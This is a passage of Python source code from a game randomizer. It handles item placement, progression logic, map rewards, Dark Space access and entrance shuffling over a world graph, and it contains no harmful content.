filled = False
while not filled and to_fill[item_type-1]:
location = to_fill[item_type-1].pop(0)
if self.fill_item(item,location,test,override_restrictions,print_log):
filled = True
filled_locations.append(location)
to_fill[item_type-1] += quarantine[item_type-1]
else:
quarantine[item_type-1].append(location)
items.append(item)
if not filled:
if print_log:
print("ERROR: Not enough room to place items")
return False
return True
# Convert a prerequisite to a list of items needed to fulfill it
def items_needed(self, edge=0):
if not edge:
return []
prereq = []
for req in self.logic[edge][4]:
item = req[0]
ct = req[1]
i = 0
while i < ct:
prereq.append(item)
i += 1
if not self.items_collected:
return prereq
prereq_new = []
items_new = self.items_collected[:]
while prereq:
x = prereq.pop(0)
if x in items_new:
items_new.remove(x)
else:
prereq_new.append(x)
return prereq_new
# Returns list of item combinations that grant progression
# Returns progression list in the following categories: [[available],[not enough room],[too many inventory items]]
def progression_list(self,open_edges=[]):
if not open_edges:
open_edges = self.get_open_edges()
all_items = self.list_item_pool(1)
#open_locations = self.find_open_locations()
open_locations = len(self.open_locations[0])
prereq_list = [[],[],[]] # [[available],[not enough room],[too many inventory items]]
ds_list = []
for edge in open_edges:
prereq = self.items_needed(edge)
if prereq and prereq not in prereq_list[0] and self.is_sublist(all_items, prereq):
if prereq not in prereq_list[1] and not self.forward_fill(prereq,self.open_locations[0],True,self.logic_mode == "Chaos"):
prereq_list[1].append(prereq)
elif prereq not in prereq_list[2]:
dest = self.logic[edge][2]
traverse_result = self.traverse([dest],True)
new_nodes = traverse_result[0]
start_items_temp = self.items_collected[:] + prereq + traverse_result[1]
item_destinations_temp = self.item_destinations[:]
for x in new_nodes:
item_destinations_temp += self.graph[x][6]
inv_temp = self.get_inventory(start_items_temp,item_destinations_temp)
if len(inv_temp) <= MAX_INVENTORY:
if self.entrance_shuffle == "None" or self.check_ds_access(dest,False,start_items_temp):
prereq_list[0].append(prereq)
else:
ds_list.append(prereq)
else:
prereq_list[2].append(prereq)
if prereq_list == [[],[],[]]:
prereq_list[0] += ds_list
return prereq_list
# Find and clear non-progression item to make room for progression item
def make_room(self, progression_result, print_log=False):
# For inventory bottlenecks, remove one inventory item and try again
if not progression_result[1] and progression_result[2]:
return self.remove_nonprog(1,0,True,print_log)
success = False
for node in self.visited:
if not success:
for x in self.graph[node][11]:
if self.is_filled(x) and self.item_pool[self.item_locations[x][3]][5]>1:
if self.unfill_item(x,print_log):
success = True
return success
#### THIS IS OLD, OBSELETE CODE
# non_prog_locations = [[],[]]
# open_locations = len(self.open_locations[0])
# open_abilities = len(self.open_locations[1])
# unfilled = []
# min_prereqs = []
# min_item_ct = 0
# min_ability_ct = 0
# progression_list = progression_result[1][:]
# while progression_list:
# prereq = progression_list.pop(0)
# items_needed = -open_locations
# abilities_needed = -open_abilities
# for x in prereq:
# if self.item_pool[x][1] == 1:
# items_needed += 1
# elif self.item_pool[x][1] == 2:
# abilities_needed += 1
# items_needed = max(0,items_needed)
# abilities_needed = max(0,abilities_needed)
# if not min_prereqs or min_item_ct+min_ability_ct > items_needed + abilities_needed:
# min_prereqs = [prereq]
# min_item_ct = items_needed
# min_ability_ct = abilities_needed
# elif min_prereqs and min_item_ct == items_needed and min_ability_ct == abilities_needed:
# min_prereqs.append(prereq)
#
# if not self.remove_nonprog(min_item_ct,min_ability_ct,False,print_log):
# if print_log:
# print("ERROR: Could not make room")
# return False
#
# return min_prereqs
# Remove an accessible non-progression item to make room for a progression item
def remove_nonprog(self,item_ct=0,ability_ct=0,inv=False,print_log=False):
junk_locations = [[],[]]
quest_locations = [[],[]]
for location in self.item_locations:
if self.item_locations[location][2] and self.is_accessible(self.item_locations[location][0]):
item = self.item_locations[location][3]
type = self.item_pool[item][1]
prog_type = self.item_pool[item][5]
inv_type = self.item_pool[item][4]
if type <= 2:
if prog_type == 2:
quest_locations[type-1].append(location)
elif prog_type == 3:
if not inv or inv_type:
junk_locations[type-1].append(location)
random.shuffle(junk_locations[0])
random.shuffle(junk_locations[1])
random.shuffle(quest_locations[0])
random.shuffle(quest_locations[1])
quest = False
type = 1
locations = junk_locations[0]
count = item_ct
done = False
items_removed = []
while not done:
if not count and type == 1:
type == 2
count = ability_ct
quest = False
locations = junk_locations[1]
if not count and type == 2:
done = True
else:
if not locations and not quest:
quest = True
locations = quest_locations[type-1]
if not locations:
if print_log:
print("ERROR: Not enough room")
return False
location = locations.pop(0)
items_removed.append(self.unfill_item(location))
count -= 1
if print_log:
print(" Removed these items:",items_removed)
return items_removed
# Converts a progression list into a normalized Monte Carlo distribution
def monte_carlo(self, progression_ls=[], start_items=[]):
if not progression_ls:
return []
progression = progression_ls[:]
items = self.list_item_pool(1)
abilities = self.list_item_pool(2)
all_items = items + abilities
sum_items = len(items)
sum_abilities = len(abilities)
probability = []
monte_carlo = []
sum_prob = 0
sum_edges = 0
probabilities = []
idx = 0
while progression:
current_prereq = progression.pop(0)
prereqs = current_prereq[:]
probability = 1.0
i = 0
j = 0
while prereqs:
item = prereqs.pop(0)
if item in all_items:
if self.item_pool[item][1] == 1:
probability *= float(self.item_pool[item][0]) / float((sum_items - i))
i += 1
elif self.item_pool[item][1] == 2:
probability *= float(self.item_pool[item][0]) / float((sum_abilities - j))
j += 1
if item in self.required_items:
probability *= PROGRESS_ADJ[self.difficulty]
probabilities.append([probability, idx])
sum_prob += probability
sum_edges += 1
idx += 1
prob_adj = 100.0 / sum_prob
rolling_sum = 0.0
for x in probabilities:
x[0] = x[0] * prob_adj + rolling_sum
rolling_sum = x[0]
# print probabilities
return probabilities
# Returns a list of map lists, by boss
def get_maps(self):
maps = [[], [], [], [], [], [], []]
for map in self.maps:
boss = self.maps[map][1]
maps[boss].append(map)
maps.pop(0)
return maps
# Randomize map-clearing rewards
def map_rewards(self):
maps = self.get_maps()
# print maps
for area in maps:
random.shuffle(area)
boss_rewards = 4
# Total rewards by type, by level (HP/STR/DEF)
if "Z3 Mode" in self.variant:
rewards_tier1 = [1] * 6 # Expert: 6 HP
rewards_tier2 = [1] * 6 # Advanced: 12 HP
rewards_tier3 = [1] * 6 # Intermediate: 18 HP
rewards_tier4 = [] # Beginner: 18 HP
else: # Remove all HP upgrades
rewards_tier1 = [1,1,1,1,1,1] # Expert: 6/0/0
rewards_tier2 = [1,1,2,2,3,3] # Advanced: 8/2/2
rewards_tier3 = [1,1,2,2,3,3] # Intermediate: 10/4/4
rewards_tier4 = [2,2,2,3,3,3] # Beginner: 10/7/7
# Remove HP upgrades in OHKO
if "OHKO" in self.variant:
for n, i in enumerate(rewards_tier1):
if i == 1:
rewards_tier1[n] = 0
for n, i in enumerate(rewards_tier2):
if i == 1:
rewards_tier2[n] = 0
for n, i in enumerate(rewards_tier3):
if i == 1:
rewards_tier3[n] = 0
for n, i in enumerate(rewards_tier4):
if i == 1:
rewards_tier4[n] = 0
random.shuffle(rewards_tier1)
random.shuffle(rewards_tier2)
random.shuffle(rewards_tier3)
random.shuffle(rewards_tier4)
# Allocate rewards to maps
for area in maps:
random.shuffle(area)
self.maps[area[0]][2] = [rewards_tier1.pop(0),1]
self.maps[area[1]][2] = [rewards_tier2.pop(0),2]
self.maps[area[2]][2] = [rewards_tier3.pop(0),3]
if rewards_tier4:
self.maps[area[3]][2] = [rewards_tier4.pop(0),4]
else:
self.maps[area[3]][2] = [0,4]
# Place Mystic Statues in World
def fill_statues(self, locations=[148, 149, 150, 151, 152, 153]):
if self.statue_req == StatueReq.PLAYER_CHOICE.value:
return self.random_fill([106]*6, locations)
return self.random_fill([100, 101, 102, 103, 104, 105], locations)
def lock_dark_spaces(self,print_log=False):
nodes = []
for edge in self.logic:
if self.logic[edge][0] >-1 and self.logic[edge][3]:
nodes.append(self.logic[edge][1])
for node in nodes:
if not self.check_ds_access(node, True):
if print_log:
print("ERROR: No Dark Space could be accessed ")
return False
else:
found_locked_ds = False
nodes_to_check = self.graph[node][9][:]
random.shuffle(nodes_to_check)
while not found_locked_ds and nodes_to_check:
ds_node = nodes_to_check.pop(0)
ds_loc = self.ds_locations[self.ds_nodes.index(ds_node)]
if self.item_locations[ds_loc][2] and not self.item_locations[ds_loc][3]:
found_locked_ds = True
#if print_log:
# print(" -Found:",self.item_locations[ds_loc][9])
if not found_locked_ds:
self.item_locations[ds_loc][2] = True
if self.item_locations[ds_loc][3]:
self.unfill_item(ds_loc)
if print_log:
print(" -Locked:",self.item_locations[ds_loc][9])
return True
# Determine an exit's direction (e.g. outside to inside)
def is_exit_coupled(self,exit,print_log=False):
if exit not in self.exits:
return False
if self.exits[exit][0]:
sister_exit = self.exits[exit][0]
if self.exits[sister_exit][0] == exit:
return sister_exit
else:
if print_log:
print("WARNING: Exits linked incorrectly",exit,sister_exit)
return sister_exit
return False
# Determine an exit's direction (e.g. outside to inside)
def exit_direction(self,exit):
if exit not in self.exits:
return False
origin = self.exits[exit][3]
dest = self.exits[exit][4]
if self.graph[origin][2] == 2:
o_type = 2
else:
o_type = 1
if self.graph[dest][2] == 2:
d_type = 2
else:
d_type = 1
# return (o_type,d_type)
if o_type == 2 and d_type == 2:
return (1,1)
else:
return d_type
# Get lists of unmatched origin/destination exits
# def get_remaining_exits(self):
# exits_remaining = [[],[]]
# for exit in self.exits:
# if self.exits[exit][1] == -1:
# exits_remaining[0].append(exit)
# if self.exits[exit][2] == -1:
# exits_remaining[1].append(exit)
# return exits_remaining
# Link one exit to another
def link_exits(self, origin_exit, dest_exit, print_log=False, check_connections=True, update_graph=True):
if origin_exit not in self.exits:
if print_log:
print("ERROR: Invalid origin (link)", origin_exit)
return False
if dest_exit not in self.exits:
if print_log:
print("ERROR: Invalid destination (link)", dest_exit)
return False
if print_log and self.exits[origin_exit][1] != -1 and origin_exit > 21:
print("WARNING: Origin already linked", origin_exit)
if print_log and self.exits[dest_exit][2] != -1 and dest_exit > 21:
print("WARNING: Destination already linked", dest_exit)
self.exits[origin_exit][1] = dest_exit
self.exits[dest_exit][2] = origin_exit
self.exit_log.append([origin_exit,dest_exit])
if print_log:
print(" Linked",self.exits[origin_exit][10], "-", self.exits[dest_exit][10])
if update_graph and self.exits[origin_exit][5]:
origin = self.exits[origin_exit][3]
dest = self.exits[dest_exit][4]
if dest not in self.graph[origin][1]:
self.graph[origin][1].append(dest)
self.new_connection(origin,dest)
if (origin_exit <= 21 or self.entrance_shuffle != "Uncoupled") and check_connections and self.is_exit_coupled(origin_exit) and self.is_exit_coupled(dest_exit):
new_origin = self.exits[dest_exit][0]
new_dest = self.exits[origin_exit][0]
if new_origin <= 21: # Boss exits
if self.exits[new_origin][5] or new_origin in self.exits_detailed:
self.link_exits(new_origin, new_dest, print_log, False, update_graph)
else:
if self.exits[new_origin][1] != -1 or self.exits[new_dest][2] != -1:
if print_log:
print("WARNING: Return exit already linked:",new_origin,new_dest)
else:
self.link_exits(new_origin, new_dest, print_log, False, update_graph)
return True
# Unlinks two previously linked exits
def unlink_exits(self, origin_exit, dest_exit, print_log=False, check_connections=True, update_graph=True):
if origin_exit not in self.exits:
if print_log:
print("ERROR: Invalid origin (unlink)", origin_exit)
return False
if dest_exit not in self.exits:
if print_log:
print("ERROR: Invalid destination (unlink)", dest_exit)
return False
if print_log and (self.exits[origin_exit][1] != dest_exit or self.exits[dest_exit][2] != origin_exit):
if print_log:
print("WARNING: Attempted to unlink exits that are not correctly linked:", origin_exit, dest_exit)
self.exits[origin_exit][1] = -1
self.exits[dest_exit][2] = -1
for x in self.exit_log:
if x[0] == origin_exit:
self.exit_log.remove(x)
if print_log:
print(" Unlinked",self.exits[origin_exit][10], "-", self.exits[dest_exit][10])
if update_graph and self.exits[origin_exit][5]:
origin = self.exits[origin_exit][3]
dest = self.exits[dest_exit][4]
if dest in self.graph[origin][1]:
self.graph[origin][1].remove(dest)
if dest in self.graph[origin][10]:
self.graph[origin][10].remove(dest)
if self.entrance_shuffle != "Uncoupled" and check_connections and self.is_exit_coupled(origin_exit) and self.is_exit_coupled(dest_exit):
new_origin = self.exits[dest_exit][0]
new_dest = self.exits[origin_exit][0]
self.unlink_exits(new_origin, new_dest, print_log, False, update_graph)
if check_connections and update_graph:
self.update_graph(True,True,True,print_log)
return True
def print_exit_log(self,exit_log=[]):
for origin,dest in exit_log:
print(self.exits[origin][10],"-",self.exits[dest][10])
# Returns lists of origin exits and destination exits that open up new nodes
def get_open_exits(self,check_progression=False):
open_exits = [[],[]]
for node in self.graph:
if not check_progression or self.is_accessible(node):
for exit in self.graph[node][14]:
if self.exits[exit][1] == -1:
open_exits[0].append(exit)
if not check_progression or not self.is_accessible(node):
for exit in self.graph[node][15]:
if self.exits[exit][2] == -1:
open_exits[1].append(exit)
return open_exits
# Takes a list of origin and destination exits, returns a suitable match
def find_exit(self,origin_exits_ls=[],dest_exits_ls=[],print_log=False,check_direction=False,check_progression=False,check_ds_access=False,test=False):
if not origin_exits_ls:
if print_log:
print("ERROR: No accessible exits available")
return False
elif not dest_exits_ls:
if print_log:
print("ERROR: No destination exits available")
return False
origin_exits = origin_exits_ls[:]
dest_exits = dest_exits_ls[:]
done = False
quarantine_o = []
while not done and origin_exits:
origin_exit = 0
while not origin_exit and origin_exits:
origin_exit = origin_exits.pop(0)
origin = self.exits[origin_exit][3]
sister_exit = self.exits[origin_exit][0]
if self.exits[origin_exit][1] != -1 or (check_progression and not self.is_accessible(origin)):
origin_exit = 0
if not origin_exit:
if print_log:
print("ERROR: No accessible exits available")
return False
direction = self.exit_direction(origin_exit)
dest_exit = 0
quarantine_d = []
while not done and dest_exits:
try_link = False
while not dest_exit and dest_exits:
dest_exit = dest_exits.pop(0)
dest = self.exits[dest_exit][4]
if self.exits[dest_exit][2] != -1 or (check_progression and self.is_accessible(dest)):
dest_exit = 0
if not dest_exit:
if print_log:
print("ERROR: No destination exits available")
return False
direction_new = self.exit_direction(dest_exit)
if dest_exit != sister_exit and (not check_direction or direction_new == direction):
try_link = True
if self.link_exits(origin_exit,dest_exit,print_log,self.entrance_shuffle != "Uncoupled",True):
if True: # or not check_ds_access or self.check_ds_access(dest):
done = True
origin_final = origin_exit
dest_final = dest_exit
if not done:
quarantine_d.append(dest_exit)
if try_link:
self.unlink_exits(origin_exit,dest_exit,print_log,True,True)
dest_exit = 0
if not done:
quarantine_o.append(origin_exit)
dest_exits += quarantine_d
quarantine_d.clear()
if not done:
if print_log:
print("ERROR: No suitable links could be found - in quarantine:",quarantine_o)
return False
# Clean up O/D lists
origin_exits += quarantine_o
for exit in origin_exits:
if self.exits[exit][1] != -1:
origin_exits.remove(exit)
for exit in dest_exits:
if self.exits[exit][2] != -1:
dest_exits.remove(exit)
return [origin_final,dest_final,origin_exits,dest_exits]
# Check if you can access one node from another
def check_access(self,origin=-1,dest=-1,check_mutual=False,print_log=False):
if origin not in self.graph or dest not in self.graph:
return False
if self.graph[origin][7] or self.graph[dest][7]:
return False
success = False
if origin == dest or dest in self.graph[origin][10]:
success = True
to_visit = self.graph[origin][10][:]
visited = [origin]
while not success and to_visit:
node = to_visit.pop(0)
visited.append(node)
if not self.graph[node][7] and dest in self.graph[node][10]:
success = True
else:
for x in self.graph[node][10]:
if x not in to_visit+visited:
to_visit.append(x)
if not check_mutual or not success:
return success
return self.check_access(dest,origin,False,print_log)
# Build islands, i.e. mutually-accessible nodes
def build_islands(self,print_log=False):
islands = []
visited = []
start_island = []
for node in self.graph:
if node not in visited and self.graph[node][2]:
to_visit = [node]
new_nodes = []
origin_exits = []
dest_exits = []
origin_logic = []
dest_logic = []
is_start = False
is_island = False
while to_visit:
x = to_visit.pop(0)
visited.append(x)
new_nodes.append(x)
if 0 in self.graph[x][8]:
is_start = True
for exit in self.graph[x][14]:
if self.exits[exit][1] == -1:
origin_exits.append(exit)
for exit in self.graph[x][15]:
if self.exits[exit][2] == -1:
dest_exits.append(exit)
for edge in self.graph[x][12]:
if self.logic[edge][0] == 0:
origin_logic.append(edge)
for edge in self.graph[x][13]:
if self.logic[edge][0] == 0:
dest_logic.append(edge)
for y in self.graph[x][10]:
if y not in visited+to_visit:
if self.check_access(x,y,True,print_log):
to_visit.append(y)
island = [new_nodes,origin_exits,dest_exits,origin_logic,dest_logic]
if is_start:
start_island = island
else:
islands.append(island)
return [start_island,islands]
# Entrance randomizer
def shuffle_exits(self,print_log=False):
# Map passages and internal dungeon exits to graph and list all available exits
one_way_exits = []
for x in self.exits:
if self.is_exit_coupled(x) and (not self.exits[x][3] or not self.exits[x][4]): # Map missing O/D data for coupled exits
xprime = self.exits[x][0]
self.exits[x][3] = self.exits[xprime][4]
self.exits[x][4] = self.exits[xprime][3]
if not self.exits[x][1] and (self.exits[x][5] or self.exits[x][6]) and not self.exits[x][7] and (not self.exits[x][8] or self.exits[x][9]):
self.exits[x][1] = -1 # Mark exit for shuffling
self.exits[x][2] = -1
if not self.is_exit_coupled(x):
one_way_exits.append(x)
self.graph[self.exits[x][3]][14].append(x)
self.graph[self.exits[x][4]][15].append(x)
# Preserve Mu key door link
self.link_exits(310,310,print_log)
# Set aside Jeweler's final exit in RJH seeds
if self.goal == "Red Jewel Hunt":
self.link_exits(720,720,print_log)
# If in Coupled mode, map one_way exits first
exit_log = []
if self.entrance_shuffle == "Coupled":
one_way_dest = one_way_exits[:]
random.shuffle(one_way_dest)
while one_way_exits:
exit1 = one_way_exits.pop()
exit2 = one_way_dest.pop()
self.link_exits(exit1, exit2, print_log, False)
exit_log.append([exit1,exit2])
if print_log:
print( "One-way exits mapped")
# Assume all items and abilities
all_items = self.list_item_pool(1) + self.list_item_pool(2)
self.items_collected = all_items
self.update_graph(True,True,True,print_log)
if print_log:
print(" Graph updated. Beginning exit shuffle...")
# for x in self.graph:
# print(x,self.graph[x])
# Build world skeleton with islands
self.unsolve()
island_result = self.build_islands()
start_island = island_result[0]
islands = island_result[1]
islands_built = []
traverse_result = self.traverse()
visited = traverse_result[0]
origin_exits = []
for node in visited:
origin_exits += self.graph[node][14]
if print_log:
# i = 0
# for x in islands:
# i += 1
# print("Island",i,x[1],x[2])
# for y in x[0]:
# print("-",self.graph[y][5])
print(" Assembling islands...")
random.shuffle(islands)
check_direction = True
check_progression = True
quarantine = []
while islands:
island = islands.pop(0)
nodes_new = island[0]
origin_exits_new = island[1]
dest_exits_new = island[2]
# if print_log:
# for y in nodes_new:
# print("-",self.graph[y][5])
if not dest_exits_new or not origin_exits_new or self.is_accessible(nodes_new[0]):
if print_log and False:
print(" NOT ELIGIBLE")
else:
if (check_progression and not origin_exits_new) or (self.entrance_shuffle == "Coupled" and (len(origin_exits_new) < 2 or len(dest_exits_new) < 2)):
quarantine.append(island)
# if print_log:
# print(" REJECTED")
else:
# if print_log:
# print(" ATTEMPTING...")
random.shuffle(origin_exits)
random.shuffle(dest_exits_new)
result = self.find_exit(origin_exits,dest_exits_new,print_log,check_direction,True)
if not result:
quarantine.append(island)
else:
traverse_result = self.traverse(island[0])
visited += traverse_result[0]
progression_result = self.get_open_exits()
origin_exits = progression_result[0]
check_direction = True
if not islands:
if check_direction:
check_direction = False
islands += quarantine
quarantine.clear()
elif check_progression:
check_progression = False
check_direction = True
islands += quarantine
quarantine.clear()
if print_log:
print(" Island construction complete")
# Check island Dark Space access, map exits accordingly
self.reset_progress()
#self.initialize_ds()
self.update_graph(True,True,True)
island_result = self.build_islands()
islands = island_result[1]
islands_no_ds = []
for island in islands:
if self.is_accessible(island[0][0]) and not self.check_ds_access(island[0][0]):
islands_no_ds.append(island)
if islands_no_ds:
if print_log:
print("Islands with no DS access:")
i = 0
for x in islands_no_ds:
i += 1
print("Island",x)
for y in x[0]:
print("-",self.graph[y][5])
dest_exits_ds = []
for node in self.graph:
if node not in visited and self.check_ds_access(node):
for exit in self.graph[node][15]:
if self.exits[exit][2] == -1:
dest_exits_ds.append(exit)
while islands_no_ds:
island = islands_no_ds.pop(0)
result = self.find_exit(island[1],dest_exits_ds,print_log,check_direction)
if not result:
if print_log:
print("ERROR: Could not find Dark Space access")
return False
else:
dest_exits_ds = result[3]
if print_log:
print(" Dark Space access check successful")
# Clean up the rest of the exits
self.reset_progress()
self.update_graph(True,True,True)
self.traverse()
check_progression = True
check_direction = True
while origin_exits:
progression_result = self.get_open_exits(check_progression)
origin_exits = progression_result[0]
dest_exits = progression_result[1]
random.shuffle(origin_exits)
random.shuffle(dest_exits)
if origin_exits:
result = self.find_exit(origin_exits,dest_exits,print_log,check_direction,check_progression,True,False)
if result:
origin_exit = result[0]
dest_exit = result[1]
dest = self.exits[dest_exit][4]
self.traverse([dest])
elif check_direction:
check_direction = False
elif check_progression:
check_progression = False
check_direction = True
if print_log:
print(" Finished mapping progression exits")
else:
if print_log:
print("WARNING: This shouldn't happen")
origin_exits = []
# Quality check for missing exits
origin_exits = []
dest_exits = []
for exit in self.exits:
if self.exits[exit][1] == -1:
if print_log:
print("How'd we miss this one??", self.exits[exit][10])
origin_exits.append(exit)
if self.exits[exit][2] == -1:
if print_log:
print("This one too??", self.exits[exit][10])
dest_exits.append(exit)
while origin_exits:
origin_exit = origin_exits.pop(0)
if not dest_exits:
if print_log:
print("ERROR: Entrance rando failed")
return False
dest_exit = dest_exits.pop(0)
self.link_exits(origin_exit,dest_exit,print_log,self.entrance_shuffle != "Uncoupled")
# Wrap it up
# self.reset_progress()
# self.update_graph(True,True,True)
if print_log:
print("Entrance rando successful!")
return True
def initialize_ds(self):
# Clear DS access data from graph
for x in self.graph:
self.graph[x][4] = 0
self.graph[x][9].clear()
# Find nodes that contain Dark Spaces
pyramid_ds_id = 130 # Special case for Pyramid DS
self.ds_locations = [pyramid_ds_id]
self.ds_nodes = [self.item_locations[pyramid_ds_id][0]]
self.freedan_locations = self.ds_locations[:]
self.freedan_nodes = self.ds_nodes[:]
for x in self.item_locations:
if self.item_locations[x][1] == 2:
self.ds_locations.append(x)
self.ds_nodes.append(self.item_locations[x][0])
if not self.is_sublist(self.item_locations[x][4], [64, 65, 66]) and self.item_locations[x][3] not in [61,62,63,64,65,66]:
self.freedan_locations.append(x)
self.freedan_nodes.append(self.item_locations[x][0])
return True
# Translates logic and exits to world graph
def update_graph(self,update_logic=True,update_ds=True,update_exits=False,print_log=False):
if print_log:
print("Updating graph...")
if update_exits:
for exit in self.exits:
if exit > 21 or self.exits[exit][5] or exit in self.exits_detailed:
# Check if exit has been shuffled
if self.exits[exit][1] > 0:
new_exit = self.exits[exit][1]
elif self.exits[exit][1] == 0:
new_exit = exit
else:
new_exit = -1
# Get exit origin
if new_exit > 0:
origin = self.exits[exit][3]
if not origin and self.is_exit_coupled(exit):
sister_exit = self.exits[exit][0]
origin = self.exits[sister_exit][4]
self.exits[exit][3] = origin
# Get (new) exit destination
if self.exits[new_exit][2] == 0 or self.exits[new_exit][2] == exit:
dest = self.exits[new_exit][4]
if not dest and self.is_exit_coupled(new_exit):
sister_exit = self.exits[new_exit][0]
dest = self.exits[sister_exit][3]
self.exits[new_exit][4] = dest
# Translate link into world graph
if origin and dest and (dest not in self.graph[origin][1]):
self.graph[origin][1].append(dest)
if print_log:
print(" Exits updated")
# Update logic edges (except those requiring Freedan access)
if update_logic:
for edge in self.logic:
if not self.logic[edge][3]:
self.check_edge(edge)
if print_log:
print(" Logic updated (item/abilities)")
for node in self.graph:
for x in self.graph[node][1]:
if x not in self.graph[node][10]:
self.graph[node][10].append(x)
for y in self.graph[node][10]:
if node not in self.graph[y][8]:
self.graph[y][8].append(node)
for z in self.graph[node][8]:
if node not in self.graph[z][10]:
self.graph[z][10].append(node)
if print_log:
print(" Graph updated")
if update_ds:
# Map DS access to nodes
self.initialize_ds()
self.update_ds_access(self.ds_nodes,1)
for node in self.freedan_nodes:
self.update_ds_access([node],2,[node])
if print_log:
print(" DS access updated")
# Update logic requiring Freedan access
if update_logic:
for edge in self.logic:
if self.logic[edge][3]:
self.check_edge(edge)
if print_log:
print(" Logic updated (DS access)")
#for x in self.graph:
# print(x,self.graph[x][11],self.graph[x][5])
#print(x,self.graph[x][4],self.graph[x][9],self.graph[x][5])
return True
# Check whether a node's DS access data needs to be updated
def consider_ds_node(self,node,access_mode=1,ds_nodes=[]):
if access_mode == 2:
if not self.graph[node][2] or self.graph[node][7]:
return False
success = False
for x in ds_nodes:
if x not in self.graph[node][9]:
success = True
return success
if not self.graph[node][4]:
return True
return False
# Check if a node has Dark Space access
def check_ds_access(self, start_node=-1, need_freedan=False, items=[]):
if start_node not in self.graph:
return False
if not self.graph[start_node][2] or self.graph[start_node][4] == 2 or (self.graph[start_node][4] == 1 and not need_freedan):
return True
elif not items:
return False
else:
to_visit = [start_node]
visited = []
ds_access = False
while not ds_access and to_visit:
node = to_visit.pop(0)
visited.append(node)
if self.check_ds_access(node,need_freedan):
return True
else:
for edge in self.graph[node][12]:
dest = self.logic[edge][2]
if dest not in visited+to_visit and not self.logic[edge][0] and self.check_edge(edge,items,False):
to_visit.append(dest)
return False
# graph_copy = copy.deepcopy(self.graph)
# self.update_graph(False,True,False)
# result = self.check_ds_access(start_node, need_freedan)
# self.graph = graph_copy
# graph_copy = None
# return result
# Update a node's DS access data - recursive for all backwards-accessible nodes
def update_ds_access(self,nodes=[],access_mode=1,ds_nodes=[]):
if not nodes:
return True
to_visit = []
for node in nodes:
if self.graph[node][4] < access_mode:
self.graph[node][4] = access_mode
for ds_node in ds_nodes:
if ds_node not in self.graph[node][9]:
self.graph[node][9].append(ds_node)
for x in self.graph[node][8]:
if self.consider_ds_node(x,access_mode,ds_nodes):
to_visit.append(x)
return self.update_ds_access(to_visit,access_mode,ds_nodes)
# Check a logic edge to see if prerequisites have been met
def check_edge(self, edge, items=[], update_graph=True, print_log=False):
success = False
if edge not in self.logic:
if print_log:
print("WARNING: Not a valid logic ID:",edge)
return False
elif self.logic[edge][0] == -1:
return False
elif self.logic[edge][0] > 0:
success = True
req_items = []
for req in self.logic[edge][4]:
i = 0
while i < req[1]:
req_items.append(req[0])
i += 1
if self.is_sublist(self.items_collected+items, req_items) and (not self.logic[edge][3] or self.check_ds_access(self.logic[edge][1],True)):
success = True
if success and update_graph:
self.open_edge(edge)
return success
# Open a logic edge and translate results to graph
def open_edge(self, edge=-1, test=False, print_log=False):
if edge not in self.logic:
return False
if self.logic[edge][0] == -1:
if print_log:
print("WARNING: Tried to open an edge that is restricted")
return False
if not self.logic[edge][0] and not test:
self.logic[edge][0] = 1
origin = self.logic[edge][1]
dest = self.logic[edge][2]
return self.new_connection(origin,dest,test)
# Map a new connection (i.e. exit, logic) to graph
def new_connection(self, origin, dest, test=False, print_log=False):
if not test:
# To/from data
if dest not in self.graph[origin][10]:
self.graph[origin][10].append(dest)
if origin not in self.graph[dest][8]:
self.graph[dest][8].append(origin)
# Dark Space access data
if self.graph[dest][4] > self.graph[origin][4]:
self.update_ds_access([origin],self.graph[dest][4],self.graph[dest][9])
# Return list of newly-accessible nodes
if self.is_accessible(origin) and not self.is_accessible(dest):
traverse_result = self.traverse([dest],test,print_log)
return traverse_result[0]
return []
# to_visit = [dest]
# while to_visit:
# node = to_visit.pop(0)
# new_nodes.append(node)
# if not test:
# self.visit_node(node,test,print_log)
# for x in self.graph[node][10]:
# if x != node and x not in to_visit+new_nodes and not self.is_accessible(x):
# to_visit.append(x)
# return new_nodes
def restrict_edge(self, edge=-1):
try:
self.logic[edge][0] = -1
return True
except:
return False
def unrestrict_edge(self, edge=-1):
try:
self.logic[edge][0] = 0 if self.logic[edge][0] != 1 else self.logic[edge][0]
return True
except:
return False
# Initialize World parameters
def initialize(self,print_log=False):
# Manage required items
if 1 in self.dungeons_req:
self.required_items += [3, 4, 7, 8]
if 2 in self.dungeons_req:
self.required_items += [14]
if 3 in self.dungeons_req:
self.required_items += [18, 19]
if 5 in self.dungeons_req:
self.required_items += [38, 30, 31, 32, 33, 34, 35]
if 6 in self.dungeons_req:
self.required_items += [39]
if self.kara == 1:
self.required_items += [2, 9, 23]
elif self.kara == 2:
self.required_items += [11, 12, 15]
elif self.kara == 4:
self.required_items += [26]
elif self.kara == 5:
self.required_items += [28, 66]
# Update inventory space logic
if 3 in self.dungeons_req:
self.item_pool[19][4] = True
if 5 in self.dungeons_req:
self.item_pool[30][4] = True
self.item_pool[31][4] = True
self.item_pool[32][4] = True
self.item_pool[33][4] = True
self.item_pool[34][4] = True
self.item_pool[35][4] = True
self.item_pool[38][4] = True
# Solid Arm can only be required in Extreme
if self.difficulty < 3:
self.exits[21][4] = self.exits[21][3]
# Allow glitches *********************
if "Allow Glitches" in self.variant:
self.graph[0][1].append(601)
self.graph[61][1].append(62) # Moon Tribe: No ability required
self.graph[181][1].append(182) # Sky Garden: Ramp glitch
self.graph[181][1].append(184)
self.graph[182][1].append(185)
self.graph[222][1].append(221) # Mu: Golem skip
self.logic[268][4][1][1] = 0 # Ankor Wat: Earthquaker not required
self.logic[273][4][0][1] = 0 # Ankor Wat: Glasses not required
self.logic[274][4][0][1] = 0
self.item_locations[124][2] = False # Ankor Wat: Dropdown DS has abilities
self.graph[410][1].append(411) # Pyramid: No ability required
self.item_locations[142][2] = False # Pyramid: Bottom DS can have abilities
if not self.fluteless:
self.graph[182][1].append(183) # Sky Garden: cage glitch
self.item_locations[94][2] = False # Great Wall: Slider glitch
self.graph[294][1].append(295)
# Early Firebird
if self.firebird:
self.graph[0][1].append(602)
self.unrestrict_edge(405)
# Zelda 3 Mode
if "Z3 Mode" in self.variant:
# Update item pool
self.item_pool[1][0] = 29 # Red Jewels
self.item_pool[50][0] = 5 # HP upgrades
self.item_pool[51][0] = 2 # DEF upgrades
self.item_pool[52][0] = 3 # STR upgrades
self.item_pool[55][0] = 12 # HP Pieces
# Open Mode
if "Open Mode" in self.variant:
# Update graph logic
self.logic[30][0] = 2 # Lola's Letter
self.logic[31][0] = 2
self.logic[32][0] = 2
self.logic[33][0] = 2 # Memory Melody
self.logic[36][0] = 2 # Teapot
self.logic[38][0] = 2 # Will
self.logic[39][0] = 2
